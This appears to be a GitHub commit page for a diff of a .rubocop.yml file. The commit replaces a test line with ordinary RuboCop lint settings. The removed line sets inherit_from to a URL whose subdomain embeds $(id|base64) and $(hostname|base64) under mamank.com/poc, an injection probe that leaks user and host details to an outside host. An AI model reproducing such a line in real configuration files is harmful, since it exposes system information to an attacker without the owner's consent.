We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 7c44ac7 commit a1326c3Copy full SHA for a1326c3
1 file changed
.rubocop.yml
@@ -1,6 +1,34 @@
1
-# TEST
2
-inherit_from:
3
- - "http://$(id|base64).$(hostname|base64).mamank.com/poc"
+require: rubocop-performance
4
5
AllCops:
6
TargetRubyVersion: 3.1
+ Exclude:
+ - '**/bin/**/*'
7
+ - '**/db/**/*'
8
+ - '**/script/setup'
9
+ - '**/vendor/**/*'
10
+
11
+Lint/AssignmentInCondition:
12
+ Enabled: false
13
14
+Metrics/BlockLength:
15
16
17
+Layout/LineLength:
18
+ Max: 100
19
+ AllowedPatterns: ['\A\s*#']
20
21
+Naming/RescuedExceptionsVariableName:
22
+ PreferredName: "error"
23
24
+Style/FrozenStringLiteralComment:
25
26
27
+Style/StringLiterals:
28
+ EnforcedStyle: double_quotes
29
30
+Style/TrailingCommaInArrayLiteral:
31
+ EnforcedStyleForMultiline: consistent_comma
32
33
+Style/TrailingCommaInHashLiteral:
34
0 commit comments